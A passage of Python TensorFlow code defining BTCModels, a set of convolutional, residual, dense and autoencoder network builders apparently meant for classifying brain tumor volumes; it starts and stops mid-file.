self._conv_bn_act(x, filters[0], 1, strides, name + \"_conv1\")\n res = self._conv_bn_act(res, filters[1], 3, 1, name + \"_conv2\")\n # Note: the third layer is inactivated\n res = self._conv_bn_act(res, filters[2], 1, 1, name + \"_conv3\", False)\n\n # Shortcut layer is inactivated\n if shortcut:\n x = self._conv_bn_act(x, filters[2], 1, strides,\n name + \"_shortcut\", False)\n\n # Elementwisely add\n with tf.name_scope(name + \"_add\"):\n res = tf.add(res, x)\n\n # Return the activated summation\n return self._activate(res)\n\n 
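# Example (shape math): _res_block(x, [16, 32, 64], strides=2) halves each spatial dimension in its first 1x1 convolution and projects x through a 1x1 shortcut, so the block outputs filters[2] = 64 channels either way.\n\n 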
#\n # Helper functions for dense cnn\n #\n\n def _dense_block(self, x, growth_rate, internals, name=\"dense_block\"):\n '''_DENSE_BLOCK\n\n The basic block of dense network.\n The structure of one block:\n --- dense block\n |--- internal1\n |--- bottleneck (if self.bc is true)\n |--- composite\n |--- concatenate\n |--- internal2\n |--- same as internal1\n ...\n |--- internaln\n |--- same as internal1\n\n Usage:\n ------\n - full: self._dense_block(x, 16, 4, \"block1\")\n\n Inputs:\n -------\n - x: tensor, input tensor\n - growth_rate: int, the number of kernels in\n each internal section\n - internals: int, the number of internals\n - name: string, block's name\n\n Output:\n -------\n - a dense block\n\n '''\n\n dense = x\n\n # Combine all internals\n for internal in range(internals):\n dense = self._dense_internal(dense, growth_rate,\n str(internal + 1), name)\n\n return dense\n\n def _dense_internal(self, x, growth_rate, no, name):\n '''_DENSE_INTERNAL\n\n Internal section of a dense block.\n - bottleneck (if self.bc is True)\n - composite\n - concatenate\n\n Usage:\n ------\n - full: self._dense_internal(x, 16, 1, \"block1\")\n\n Inputs:\n -------\n - x: tensor, input tensor\n - growth_rate: int, the number of kernels\n - no: string, internal number\n - name: string, block's name\n\n Output:\n -------\n - one internal section of one dense block\n\n '''\n\n dint = x\n\n # Obtain bottleneck section\n if self.bc:\n with tf.variable_scope(name + \"_bott\" + no):\n dint = self._bottleneck(x, growth_rate)\n\n # Obtain composite section\n with tf.variable_scope(name + \"_comp\" + no):\n dint = self._composite(dint, growth_rate, 3)\n\n # Concatenate original input (or bottleneck section)\n # with composite section\n\n with tf.name_scope(name + \"_concat\" + no):\n dint = tf.concat((x, dint), self.concat_axis)\n\n return dint\n\n def _bottleneck(self, x, filters, name=\"bottleneck\"):\n '''_BOTTLENECK\n\n Bottleneck section to reduce the number of input\n features to improve computational efficiency.\n - batch normalization\n - activation\n - convolution\n - dropout if self.is_training is a True placeholder\n\n Usage:\n ------\n - full: self._bottleneck(x, 16, \"bottleneck\")\n\n Inputs:\n -------\n - x: tensor, input tensor\n - filters: int, also known as growth rate, the number of\n filters in composite section\n - name: string, section's name\n\n Output:\n -------\n - the bottleneck layer\n\n '''\n\n bott = self._batch_norm(x)\n bott = self._activate(bott)\n bott = self._conv(bott, filters * 4, 1)\n bott = self._dropout(bott)\n\n return bott\n\n def _composite(self, x, filters, kernel_size=3, name=\"composite\"):\n '''_COMPOSITE\n\n The convolutional section of dense block.\n - batch normalization\n - activation\n - convolution\n - dropout if self.is_training is a True placeholder\n\n Usage:\n - full: self._composite(x, 16, 3, \"composite\")\n\n Inputs:\n -------\n - x: tensor, input tensor\n - filters: int, also known as growth rate,\n the number of filters\n - kernel_size: int, the size of kernels\n - name: string, section's name\n\n Output:\n -------\n - a composite section\n\n '''\n\n comp = self._batch_norm(x)\n comp = self._activate(comp)\n comp = self._conv(comp, filters, kernel_size)\n comp = self._dropout(comp)\n\n return comp\n\n def _transition(self, x, name=\"transition\"):\n '''_TRANSITION\n\n The transition layer between two dense blocks.\n - batch normalization\n - activation\n - convolution\n - dropout if self.is_training is a True placeholder\n - average pooling\n\n Usage:\n ------\n - full: self._transition(x, \"trans\")\n\n Inputs:\n -------\n - x: tensor, input tensor\n - name: string, section's name\n\n Output:\n - a tensor after average pooling\n\n '''\n\n out_channels = x.get_shape().as_list()[-1]\n with tf.variable_scope(name + \"_comp\"):\n tran = self._composite(x, out_channels, 1)\n tran = self._average_pool(tran, 2, name 
+ \"_avgpool\")\n\n return tran\n\n def _last_transition(self, x, name=\"global_avgpool\"):\n '''_LAST_TRANSITION\n\n The last transition section before logits layer.\n - batch normalization\n - activation\n - global average polling\n\n Usage:\n ------\n - full: self._last_transition(x, \"trans\")\n\n Inputs:\n -------\n - x: tensor, input tensor\n - name: string, section's name\n\n Output:\n - a tensor after global average pooling\n\n '''\n\n with tf.variable_scope(\"last_trans\"):\n last_tran = self._batch_norm(x)\n last_tran = self._activate(last_tran)\n\n last_tran = self._average_pool(last_tran, -1, name)\n\n return last_tran\n\n #\n # Helper functions for autoencoder\n #\n\n def _deconv(self, x, filters, kernel_size, strides=1, name=\"deconv_var\"):\n '''_DECONV\n\n Return 3D or 2D deconvolution layer with variables\n initialized by xavier method.\n\n Usages:\n -------\n - full: self._deconv(x, 32, 3, 1, \"deconv\")\n - short: self._deconv(x, 32, 3)\n\n Inputs:\n -------\n - x: tensor, input layer\n - filters: int, the number of kernels\n - kernel_size: int, the size of kernel\n - strides: int, strides along dimentions\n - name: string, layer's name\n\n Output:\n -------\n - a 3D or 2D deconvolution layer\n\n '''\n\n padding = \"valid\" if kernel_size == 1 else \"same\"\n\n with tf.name_scope(\"deconv\"):\n return self.deconv_func(inputs=x,\n filters=filters,\n kernel_size=kernel_size,\n strides=strides,\n padding=padding,\n kernel_initializer=xavier_initializer(),\n name=name)\n\n def _deconv_bn_act(self, x, filters, kernel_size,\n strides=1, name=\"dba\", act=True):\n '''_DECONV_BN_ACT\n\n A deconvolution block, including three sections:\n - 3D or 2D deconvolution layer\n - batch normalization\n - activation\n\n Usages:\n -------\n - full: self._deconv_bn_act(x, 32, 3, 1, \"dba\", True)\n - short: self._deconv_bn_act(x, 32, 3, 1, \"dba\")\n\n Inputs:\n -------\n - x: tensor, input layer\n - filters: int, the number of kernels\n - kernel_size: int, the size of kernel\n - strides: int, strides along dimentions\n - name: string, layer's name\n - act: string or None, indicates the activation,\n method, if None, return inactivated layer\n\n Output:\n - a deconvoluted, normalized and activated (if not None) layer\n\n '''\n\n with tf.variable_scope(name):\n dba = self._deconv(x, filters, kernel_size, strides)\n dba = self._batch_norm(dba)\n if act: # If False, return inactivated result\n dba = self._activate(dba)\n\n return dba\n\n def _encoder_stride(self, x):\n '''_ENCODER_STRIDE\n\n Encoder sectio of autoencoder.\n Each convolutional layer has strides 2.\n No other pooling methods are applied.\n\n Inputs:\n -------\n - x: tensor, original input\n\n Output:\n -------\n - compressed representation of input sample\n\n '''\n\n code = self._conv_bn_act(x, 32, 5, 1, \"conv1\")\n code = self._conv_bn_act(code, 32, 5, 1, \"conv2\")\n code = self._conv_bn_act(code, 64, 5, 2, \"conv3\")\n # code = self._dropout(code, \"en_dropout1\")\n code = self._conv_bn_act(code, 64, 5, 1, \"conv4\")\n code = self._conv_bn_act(code, 64, 5, 1, \"conv5\")\n code = self._conv_bn_act(code, 128, 5, 2, \"conv6\")\n # code = self._dropout(code, \"en_dropout2\")\n code = self._conv_bn_act(code, 128, 5, 1, \"conv7\")\n code = self._conv_bn_act(code, 128, 5, 1, \"conv8\")\n code = self._conv_bn_act(code, 256, 5, 2, \"conv9\")\n\n return code\n\n def _encoder_decoder(self, x):\n preconv = self._conv_bn_act(x, 32, 7, 1, \"preconv\")\n\n # 112\n code1 = self._conv_bn_act(preconv, 64, 3, 1, \"code1\")\n code2_na = 
self._conv_bn_act(code1, 64, 3, 1, \"code2_na\", False)\n code2 = self._activate(code2_na, \"code2\")\n\n # 56\n maxp1 = self._pooling(code2, 2, \"max\", \"maxp1\")\n code3 = self._conv_bn_act(maxp1, 128, 3, 1, \"code3\")\n code4_na = self._conv_bn_act(code3, 128, 3, 1, \"code4_na\", False)\n code4 = self._activate(code4_na, \"code4\")\n\n # 28\n maxp2 = self._pooling(code4, 2, \"max\", \"maxp2\")\n code5 = self._conv_bn_act(maxp2, 256, 3, 1, \"code5\")\n code6_na = self._conv_bn_act(code5, 256, 3, 1, \"code6_na\", False)\n code6 = self._activate(code6_na, \"code6\")\n\n # 14\n maxp3 = self._pooling(code6, 2, \"max\", \"maxp3\")\n code7 = self._conv_bn_act(maxp3, 512, 3, 1, \"code7\")\n code8_na = self._conv_bn_act(code7, 512, 3, 1, \"code8_na\", False)\n code8 = self._activate(code8_na, \"code8\")\n\n # 7\n maxp4 = self._pooling(code8, 2, \"max\", \"maxp4\")\n code9 = self._conv_bn_act(maxp4, 1024, 3, 1, \"code9\")\n code10 = self._conv_bn_act(code9, 1024, 3, 1, \"code10\")\n\n # 14\n upsp1 = UpSampling2D(size=(2, 2))(code10)\n code11_na = self._conv_bn_act(upsp1, 512, 3, 1, \"code11_na\", False)\n code11 = self._activate(tf.add(code11_na, code8_na), \"code11\")\n code12 = self._conv_bn_act(code11, 512, 3, 1, \"code12\")\n\n # 28\n upsp2 = UpSampling2D(size=(2, 2))(code12)\n code13_na = self._conv_bn_act(upsp2, 256, 3, 1, \"code13_na\", False)\n code13 = self._activate(tf.add(code13_na, code6_na), \"code13\")\n code14 = self._conv_bn_act(code13, 256, 3, 1, \"code14\")\n\n # 56\n upsp3 = UpSampling2D(size=(2, 2))(code14)\n code15_na = self._conv_bn_act(upsp3, 128, 3, 1, \"code15_na\", False)\n code15 = self._activate(tf.add(code15_na, code4_na), \"code15\")\n code16 = self._conv_bn_act(code15, 128, 3, 1, \"code16\")\n\n # 112\n upsp4 = UpSampling2D(size=(2, 2))(code16)\n code17_na = self._conv_bn_act(upsp4, 64, 3, 1, \"code17_na\", False)\n code17 = self._activate(tf.add(code17_na, code2_na), \"code17\")\n code18 = self._conv_bn_act(code17, 64, 3, 1, \"code18\")\n\n decode = self._conv_bn_act(code18, 4, 1, 1, \"decode\", False)\n decode = tf.nn.tanh(decode, \"tanh\")\n\n return decode\n\n def _encoder_pool(self, x):\n '''_ENCODER_POOL\n\n Encoder sectio of autoencoder.\n Convolutional layer has strides 1.\n Max pooling method is applied after\n each convolutional layer.\n\n Inputs:\n -------\n - x: tensor, original input\n\n Output:\n -------\n - compressed representation of input sample\n\n '''\n\n code = self._conv_bn_act(x, 32, 7, 1, \"conv1\")\n code = self._conv_bn_act(code, 32, 7, 1, \"conv2\")\n code = self._conv_bn_act(code, 32, 7, 1, \"conv3\")\n code = self._pooling(code, 2, \"max\", \"max_pool1\")\n # code = self._dropout(code, \"en_dropout1\")\n code = self._conv_bn_act(code, 64, 5, 1, \"conv4\")\n code = self._conv_bn_act(code, 64, 5, 1, \"conv5\")\n code = self._conv_bn_act(code, 64, 5, 1, \"conv6\")\n code = self._pooling(code, 2, \"max\", \"max_pool2\")\n # code = self._dropout(code, \"en_dropout2\")\n code = self._conv_bn_act(code, 128, 3, 1, \"conv7\")\n code = self._conv_bn_act(code, 128, 3, 1, \"conv8\")\n code = self._conv_bn_act(code, 128, 3, 1, \"conv9\")\n code = self._pooling(code, 2, \"max\", \"max_pool3\")\n code = self._conv_bn_act(code, 256, 3, 1, \"conv10\")\n code = self._conv_bn_act(code, 256, 3, 1, \"conv11\")\n code = self._conv_bn_act(code, 256, 3, 1, \"conv12\")\n code = self._pooling(code, 2, \"max\", \"max_pool4\")\n code = self._conv_bn_act(code, 512, 3, 1, \"conv13\")\n code = self._conv_bn_act(code, 1024, 3, 1, \"conv14\")\n\n return code\n\n def 
_wta_constraint(self, code, k=1):\n '''_WTA_CONSTRAINT\n\n Winner-Take-All constraint to generate sparse\n representation by keeping largest values of\n the compression code, which consists of two steps:\n - get spatial sparsity\n - get lifetime sparsity\n\n Inputs:\n -------\n - code: tensor, compressed code after encoder\n - k: int, the number of largest values to be kept\n - another parameter, lifetime_rate, has been assigned\n when the instance is initialized\n\n Output:\n -------\n - sparse representation\n\n '''\n\n # The function to kept k largest values in\n # code, and set others to zeros.\n def spatial_sparsity(code, k):\n # Obtain the shape of code\n # n: batch size\n # c: the number of feaure maps\n # (or the number of filters)\n shape = code.get_shape().as_list()\n n, c = shape[0], shape[-1]\n\n # As the input tensor could be 5D or 4D,\n # set up parameters for different inputs\n if len(shape) == 5:\n transpose_perm = [0, 4, 1, 2, 3]\n threshold_shape = [n, 1, 1, 1, c]\n elif len(shape) == 4:\n transpose_perm = [0, 3, 1, 2]\n threshold_shape = [n, 1, 1, c]\n else:\n raise ValueError(\"Cannot handle with the input.\")\n\n code_transpose = tf.transpose(code, transpose_perm)\n code_reshape = tf.reshape(code_transpose, [n, c, -1])\n\n # Get top k values of code\n code_top_k, _ = tf.nn.top_k(code_reshape, k)\n # Get the minimum of top k values to do thresholding\n code_top_k_min = code_top_k[..., k - 1]\n\n # Threshold the code, the indices of top k values is 1,\n # and set others to 0\n threshold = tf.reshape(code_top_k_min, threshold_shape)\n drop_map = tf.where(code < threshold,\n tf.zeros(shape, tf.float32),\n tf.ones(shape, tf.float32))\n\n # Keep top k value in code\n code = code * drop_map\n # Save top k values as winner\n winner = tf.reshape(code_top_k, [n, c, k])\n\n return code, winner\n\n # The function to carry out lifetime sparsity.\n # For example, the batch size is 64, which means each\n # filter will lead to 64 winners, lifetime sparsity\n # is going to keep largest winners in the percentage of\n # self.lifetime_rate, and set others to zeros. 
Those left\n # feature maps are winners among winners.\n def lifetime_sparsity(code, winner):\n # Obtain the shape of code and winner\n # n: batch size\n # c: the number of feature maps\n # (or the number of filters)\n # k: the number of winners to be kept\n code_shape = code.get_shape().as_list()\n winner_shape = winner.get_shape().as_list()\n n, c = winner_shape[0], winner_shape[1]\n k = int(self.lifetime_rate * n) + 1\n\n # Compute mean value of each winner\n winner_mean = tf.reduce_mean(winner, axis=2)\n winner_mean = tf.transpose(winner_mean)\n # Get top k mean values of top k winners\n winner_mean_top_k, _ = tf.nn.top_k(winner_mean, k)\n # Get the minimum of top k values to do thresholding\n winner_mean_top_k_min = winner_mean_top_k[..., k - 1]\n winner_mean_top_k_min = tf.reshape(winner_mean_top_k_min, [c, 1])\n\n # Threshold the winner, the indices of top k winners is 1,\n # and set others to 0\n drop_map = tf.where(winner_mean < winner_mean_top_k_min,\n tf.zeros([c, n], tf.float32),\n tf.ones([c, n], tf.float32))\n drop_map = tf.transpose(drop_map)\n\n # As the input tensor could be 5D or 4D,\n # set up parameters for different inputs\n if len(code_shape) == 5:\n reform_shape = [n, 1, 1, 1, c]\n elif len(code_shape) == 4:\n reform_shape = [n, 1, 1, c]\n else:\n raise ValueError(\"Cannot handle the input.\")\n\n # Keep top k winners in code\n code = code * tf.reshape(drop_map, reform_shape)\n\n return code\n\n # Winner-Take-All constraint\n code, winner = spatial_sparsity(code, k)\n code = lifetime_sparsity(code, winner)\n\n return code\n\n def _decoder(self, code):\n '''_DECODER\n\n Decoder section of autoencoder to\n reconstruct code to input.\n\n Input:\n ------\n - code: tensor, compressed representation\n\n Output:\n -------\n - the reconstruction from code\n\n '''\n\n # decode = self._dropout(code, \"de_dropout1\")\n decode = self._deconv_bn_act(code, 512, 3, 2, \"deconv1\")\n # decode = self._dropout(decode, \"de_dropout2\")\n decode = self._deconv_bn_act(decode, 256, 3, 2, \"deconv2\")\n decode = self._deconv_bn_act(decode, 128, 3, 2, \"deconv3\")\n # decode = self._dropout(decode, \"de_dropout3\")\n decode = self._deconv_bn_act(decode, 4, 3, 2, \"deconv4\", False)\n decode = tf.nn.tanh(decode, \"tanh\")\n\n return decode\n\n #\n # Error Check\n #\n\n def _check_input(self, x):\n '''_CHECK_INPUT\n\n Check whether the dimensions of the input tensor\n satisfy the requirement of the model. If not,\n raise an error and quit the program.\n\n Input:\n ------\n - x: tensor, the tensor input to the model\n\n '''\n\n # Obtain the shape of input\n x_dims = len(x.get_shape().as_list())\n\n if (x_dims == 5 and (self.dims == \"3d\" or self.dims == \"3D\")) or \\\n (x_dims == 4 and (self.dims == \"2d\" or self.dims == \"2D\")):\n pass\n else: # The input is unwanted\n msg = (\"Your model deals with {0} data, the input tensor should be {1}D. \" +\n \"But your input is {2}D.\").format(self.dims, self.right_dims, x_dims)\n raise ValueError(msg)\n\n return\n\n 
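# Example (hypothetical shapes): with dims=\"3d\" the model expects 5D inputs such as [batch, depth, height, width, channels]; a 4D input would make _check_input raise the ValueError above.\n\n 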
def _check_output(self, x, output):\n '''_CHECK_OUTPUT\n\n Obtain the dimensions of input and output respectively,\n and check whether they are the same. If not, raise an error\n and quit the program. This check is only for AUTOENCODER.\n\n Inputs:\n -------\n - x: tensor, the input tensor\n - output: tensor, the output generated from model\n\n '''\n\n # Obtain dimensions\n x_dims = x.get_shape().as_list()\n output_dims = output.get_shape().as_list()\n\n if x_dims == output_dims:\n return\n else: # They are not the same\n msg = (\"Input tensor shape: {0}, output tensor shape: {1}. \" +\n \"They should be the same.\").format(x_dims, output_dims)\n raise ValueError(msg)\n\n return\n\n #\n # A Simple Test Case\n #\n\n def test(self, x, is_training):\n '''_TEST\n\n A function to test basic helpers.\n\n Inputs:\n -------\n - x: tensor placeholder, input volumes in batch\n - is_training: boolean placeholder, indicates the mode,\n True: training mode,\n False: validating and inferencing mode\n\n '''\n\n self._check_input(x)\n self.is_training = is_training\n\n net = self._conv_bn_act(x, 2, 3, 1, \"layer1\")\n net = self._max_pool(net, 2, \"max_pool1\")\n net = self._conv_bn_act(net, 2, 3, 1, \"layer2\")\n net = self._average_pool(net, 2, \"avg_pool2\")\n net = self._conv_bn_act(net, 2, 3, 1, \"layer3\")\n net = self._max_pool(net, 2, \"max_pool3\")\n net = self._flatten(net, \"flatten\")\n net = self._fc_bn_act(net, 64, \"fcn1\")\n net = self._dropout(net, \"drop1\")\n net = self._fc_bn_act(net, 64, \"fcn2\")\n net = self._dropout(net, \"drop2\")\n net = self._logits_fc(net, \"logits\")\n net = tf.nn.softmax(logits=net, name=\"softmax\")\n\n print(\"Simple test of Class BTCModels\")\n print(\"Input n volumes in 3 classes\")\n print(\"Output probabilities' shape: \", net.shape)\n\n return\n\n #\n # Construct Models\n #\n\n def cnn(self, x, is_training):\n '''CNN\n\n VGG-like CNN model.\n\n Inputs:\n -------\n - x: tensor placeholder, input volumes in batch\n - is_training: boolean placeholder, indicates the mode,\n True: training mode,\n False: validating and inferencing mode\n\n Output:\n -------\n - output logits after VGG-like CNN\n\n '''\n\n self._check_input(x)\n self.is_training = is_training\n\n # Here is a very simple case to test btc_train first\n net = self._conv_bn_act(x, 32, 3, 1, \"layer1\")\n net = self._conv_bn_act(net, 32, 3, 1, \"layer2\")\n net = self._pooling(net, 2, \"max\", \"max_pool1\")\n net = self._dropout(net, \"dropout1\")\n net = self._conv_bn_act(net, 64, 3, 1, \"layer3\")\n net = self._conv_bn_act(net, 64, 3, 1, \"layer4\")\n net = self._pooling(net, 2, \"max\", \"max_pool2\")\n net = self._dropout(net, \"dropout2\")\n net = self._conv_bn_act(net, 128, 3, 1, \"layer5\")\n net = self._conv_bn_act(net, 128, 3, 1, \"layer6\")\n net = self._pooling(net, 2, \"max\", \"max_pool3\")\n net = self._dropout(net, \"dropout3\")\n net = self._conv_bn_act(net, 256, 3, 1, \"layer7\")\n net = self._conv_bn_act(net, 256, 3, 1, \"layer8\")\n net = self._pooling(net, -1, \"max\", \"global_maxpool\")\n net = self._flatten(net, \"flatten\")\n net = self._dropout(net, \"dropout4\")\n net = self._fc_bn_act(net, 256, \"fc1\")\n net = self._dropout(net, \"dropout5\")\n net = self._fc_bn_act(net, 512, \"fc2\")\n net = self._dropout(net, \"dropout6\")\n net = self._logits_fc(net, \"logits\")\n\n return net\n\n def _cnn_branch(self, x, branch):\n net = self._conv_bn_act(x, 16, 3, 1, branch + \"_layer1\")\n net = self._conv_bn_act(net, 16, 3, 1, branch + \"_layer2\")\n # net = self._conv_bn_act(net, 16, 3, 1, branch + \"_layer3\")\n net = self._pooling(net, 2, \"max\", branch + \"maxpool1\")\n net = self._conv_bn_act(net, 32, 3, 1, branch + \"_layer4\")\n # net = self._conv_bn_act(net, 32, 3, 1, branch 
+ \"_layer5\")\n net = self._conv_bn_act(net, 32, 3, 1, branch + \"_layer6\")\n net = self._pooling(net, 2, \"max\", branch + \"maxpool2\")\n net = self._conv_bn_act(net, 64, 3, 1, branch + \"_layer7\")\n net = self._conv_bn_act(net, 64, 3, 1, branch + \"_layer8\")\n net = self._conv_bn_act(net, 64, 3, 1, branch + \"_layer9\")\n net = self._pooling(net, 2, \"max\", branch + \"maxpool3\")\n net = self._conv_bn_act(net, 128, 3, 1, branch + \"_layer10\")\n net = self._conv_bn_act(net, 128, 3, 1, branch + \"_layer11\")\n net = self._conv_bn_act(net, 128, 3, 1, branch + \"_layer12\")\n\n # net = self._pooling(net, -1, \"max\", branch + \"_global_maxpool\")\n # net = self._flatten(net, \"flatten\")\n\n return net\n\n def _res_branch(self, x, branch):\n net = self._conv_bn_act(x, 16, 5, 1, branch + \"_preconv\")\n net = self._res_block(net, [16, 16, 16], 1, branch + \"_res1\")\n net = self._res_block(net, [16, 32, 32], 2, branch + \"_res2\")\n net = self._res_block(net, [32, 32, 32], 1, branch + \"_res3\")\n net = self._res_block(net, [32, 64, 64], 2, branch + \"_res4\")\n net = self._res_block(net, [64, 64, 64], 1, branch + \"_res5\")\n net = self._res_block(net, [64, 128, 128], 2, branch + \"_res6\")\n net = self._res_block(net, [128, 256, 256], 1, branch + \"_res7\")\n\n net = self._pooling(net, -1, \"max\", branch + \"_global_maxpool\")\n net = self._flatten(net, \"flatten\")\n\n return net\n\n def multi_cnn(self, x, is_training):\n self._check_input(x)\n self.is_training = is_training\n\n dims = x.get_shape().as_list()[:-1] + [1]\n input0 = tf.reshape(x[..., 0], dims)\n input1 = tf.reshape(x[..., 1], dims)\n input2 = tf.reshape(x[..., 2], dims)\n input3 = tf.reshape(x[..., 3], dims)\n\n # net0 = self._cnn_branch(input0, \"branch0\")\n # net1 = self._cnn_branch(input1, \"branch1\")\n # net2 = self._cnn_branch(input2, \"branch2\")\n # net3 = self._cnn_branch(input3, \"branch3\")\n\n net0 = self._res_branch(input0, \"branch0\")\n net1 = self._res_branch(input1, \"branch1\")\n net2 = self._res_branch(input2, \"branch2\")\n net3 = self._res_branch(input3, \"branch3\")\n\n # nets = [net0]\n\n net = tf.concat([net0, net1, net2, net3], 1, \"concate\")\n # net = tf.concat([net0, net1, net2, net3], 4, \"concate\")\n # net = self._dropout(net, \"dropout1\")\n # net = self._conv_bn_act(net, 256, 3, 1, \"layer1\")\n # net = self._conv_bn_act(net, 256, 3, 1, \"layer2\")\n\n # net = self._pooling(net, -1, \"max\", \"global_maxpool\")\n # net = self._flatten(net, \"flatten\")\n\n net = self._dropout(net, \"dropout1\")\n # net = self._fc_bn_act(net, 1024, \"fc1\")\n # net = self._dropout(net, \"dropout2\")\n # net = self._fc_bn_act(net, 1024, \"fc2\")\n # net = self._dropout(net, \"dropout3\")\n net = self._logits_fc(net, \"logits\")\n\n return net\n\n def full_cnn(self, x, is_training):\n '''FULL_CNN\n\n CNN with convolutional logits layer, without\n fully connected layers.\n\n Inputs:\n -------\n - x: tensor placeholder, input volumes in batch\n - is_training: boolean placeholder, indicates the mode,\n True: training mode,\n False: validating and inferencing mode\n\n Output:\n -------\n - output logits after Fully CNN\n\n '''\n\n self._check_input(x)\n self.is_training = is_training\n\n # Here is a very simple case to test btc_train first\n net = self._conv_bn_act(x, 32, 3, 1, \"layer1\")\n net = self._pooling(net, 2, \"max\", \"max_pool1\")\n net = self._dropout(net, \"dropout1\")\n net = self._conv_bn_act(net, 64, 3, 1, \"layer2\")\n net = self._pooling(net, 2, \"max\", \"max_pool2\")\n net = 
self._dropout(net, \"dropout2\")\n net = self._conv_bn_act(net, 128, 3, 1, \"layer3\")\n net = self._pooling(net, 2, \"max\", \"max_pool3\")\n net = self._dropout(net, \"dropout3\")\n net = self._conv_bn_act(net, 256, 3, 1, \"layer4\")\n net = self._dropout(net, \"dropout4\")\n net = self._logits_conv(net, \"logits_conv\")\n net = self._flatten(net, \"logits_flatten\")\n\n return net\n\n def res_cnn(self, x, is_training):\n '''RES_CNN\n\n Residual CNN (ResNet).\n\n Inputs:\n -------\n - x: tensor placeholder, input volumes in batch\n - is_training: boolean placeholder, indicates the mode,\n True: training mode,\n False: validating and inferencing mode\n\n Output:\n -------\n - output logits after ResNet\n\n '''\n\n self._check_input(x)\n self.is_training = is_training\n\n # Here is a very simple case to test btc_train first\n net = self._conv_bn_act(x, 16, 5, 1, \"preconv\")\n net = self._res_block(net, [16, 16, 16], 1, \"res1\")\n net = self._res_block(net, [16, 16, 16], 1, \"res2\")\n net = self._res_block(net, [16, 32, 32], 2, \"res3\")\n net = self._res_block(net, [32, 32, 32], 1, \"res4\")\n net = self._res_block(net, [32, 32, 32], 1, \"res5\")\n net = self._res_block(net, [32, 64, 64], 2, \"res6\")\n net = self._res_block(net, [64, 64, 64], 1, \"res7\")\n net = self._res_block(net, [64, 64, 64], 1, \"res8\")\n net = self._res_block(net, [128, 128, 128], 2, \"res9\")\n net = self._res_block(net, [128, 128, 128], 1, \"res10\")\n net = self._res_block(net, [128, 256, 256], 1, \"res11\")\n net = self._pooling(net, -1, \"avg\", \"global_avgpool\")\n net = self._flatten(net, \"flatten\")\n net = self._logits_fc(net, \"logits\")\n\n return net\n\n def dense_cnn(self, x, is_training):\n '''DENSE_NET\n\n Densely CNN (DenseNet).\n\n Inputs:\n -------\n - x: tensor placeholder, input volumes in batch\n - is_training: boolean placeholder, indicates the mode,\n True: training mode,\n False: validating and inferencing mode\n\n Output:\n -------\n - output logits after DenseNet\n\n '''\n\n self._check_input(x)\n self.is_training = is_training\n\n # Set the bottleneck symbol\n self.bc = True\n\n # Here is a very simple case to test btc_train first\n # Preconv layer before dense block\n with tf.variable_scope(\"preconv\"):\n net = self._conv(x, 1, 5, 2)\n net = self._dense_block(net, 1, 2, \"dense1\")\n net = self._transition(net, \"trans1\")\n net = self._dense_block(net, 1, 2, \"dense2\")\n net = self._last_transition(net, \"global_avgpool\")\n net = self._flatten(net, \"flatten\")\n net = self._logits_fc(net, \"logits\")\n\n return net\n\n def autoencoder(self, x, is_training, sparse_type=None, k=None):\n '''AUTOENCODER\n\n Autoencoder with stride pooling.\n\n Inputs:\n -------\n - x: tensor placeholder, input volumes in batch\n - is_training: boolean placeholder, indicates the mode,\n True: training mode,\n False: validating and inferencing mode\n - sparse_type: string, \"kl\" or \"wta\"\n - k: int, parameters for Winner-Take-All constraint\n\n Output:\n -------\n - a reconstructed tensor of input\n\n '''\n\n if self.encoder is None:\n raise ValueError(\"Pool method is None.\")\n\n self._check_input(x)\n self.is_training = is_training\n\n # Encoder section\n # code = self.encoder(x)\n\n # Winner-Take-All constraint\n # if sparse_type == \"wta\":\n # code = self._wta_constraint(code, k)\n\n # Decoder section\n # decode = self._decoder(code)\n\n decode = self._encoder_decoder(x)\n\n self._check_output(x, decode)\n\n return decode\n\n def autoencoder_classier(self, x, is_training):\n 
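# `_res_block(net, [c1, c2, c3], stride, name)` is used by res_cnn and _res_branch above,
# but its definition lies outside this excerpt. A plausible TF1-style residual block
# matching that signature -- a hedged sketch assuming `tensorflow as tf` is imported,
# not the author's real implementation:
def res_block(x, filters, stride, name, training):
    c1, c2, c3 = filters
    with tf.variable_scope(name):
        net = tf.layers.conv3d(x, c1, 3, strides=stride, padding="same", name="conv1")
        net = tf.layers.batch_normalization(net, training=training, name="bn1")
        net = tf.nn.relu(net)
        net = tf.layers.conv3d(net, c2, 3, padding="same", name="conv2")
        net = tf.layers.batch_normalization(net, training=training, name="bn2")
        net = tf.nn.relu(net)
        net = tf.layers.conv3d(net, c3, 3, padding="same", name="conv3")
        net = tf.layers.batch_normalization(net, training=training, name="bn3")
        # 1x1 projection so the shortcut matches the (possibly strided) main path
        shortcut = tf.layers.conv3d(x, c3, 1, strides=stride, padding="same", name="proj")
        return tf.nn.relu(net + shortcut)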
'''CAE_CLASSIER_STRIDE\n\n Apply pre-trained model to generate code\n for each case. Train logistic regression\n to classify input case.\n\n Inputs:\n -------\n - x: tensor placeholder, input volumes in batch\n - is_training: boolean placeholder, indicates the mode,\n True: training mode,\n False: validating and inferencing mode\n\n Output:\n -------\n - output logits after classifier\n\n '''\n\n self._check_input(x)\n self.is_training = is_training\n\n # Encoder section\n code = self.encoder(x)\n # Global max pooling\n # code_avg = self._pooling(code, -1, \"avg\", \"global_avgpool\")\n # code_max = self._pooling(code, -1, \"max\", \"global_maxpool\")\n # code = tf.concat([code_avg, code_max], 1, \"concat\")\n code = self._flatten(code, \"flatten\")\n code = self._activate(code, \"act\")\n code = self._batch_norm(code, \"bn\")\n code = self._dropout(code, \"dropout1\")\n feat = self._fc_bn_act(code, 128, \"fc1\")\n feat = self._dropout(feat, \"dropout2\")\n # feat = self._fc_bn_act(code, 64, \"fc2\")\n # feat = self._dropout(feat, \"dropout3\")\n output = self._logits_fc(feat, \"logits\")\n\n return output\n\n\nif __name__ == \"__main__\":\n\n models = BTCModels(classes=3, act=\"relu\", alpha=None,\n momentum=0.99, drop_rate=0.5, dims=\"3d\",\n cae_pool=\"stride\", lifetime_rate=0.2)\n\n # Test function for cnn, full_cnn, res_cnn, dense_cnn and autoencoder\n x_3d = tf.placeholder(tf.float32, [32, 49, 49, 49, 4])\n # x_3d = tf.placeholder(tf.float32, [32, 112, 112, 88, 4])\n x_2d = tf.placeholder(tf.float32, [32, 112, 112, 4])\n is_training = tf.placeholder(tf.bool, [])\n\n # models.test(x_3d, is_training)\n # net = models.cnn(x_3d, is_training)\n # net = models.full_cnn(x_3d, is_training)\n # net = models.res_cnn(x_3d, is_training)\n # net = models.dense_cnn(x_3d, is_training)\n # net = models.autoencoder(x_3d, is_training)\n # net = models.autoencoder(x_3d, is_training, \"wta\", 10)\n # net = models.autoencoder_classier(x_3d, is_training)\n net = 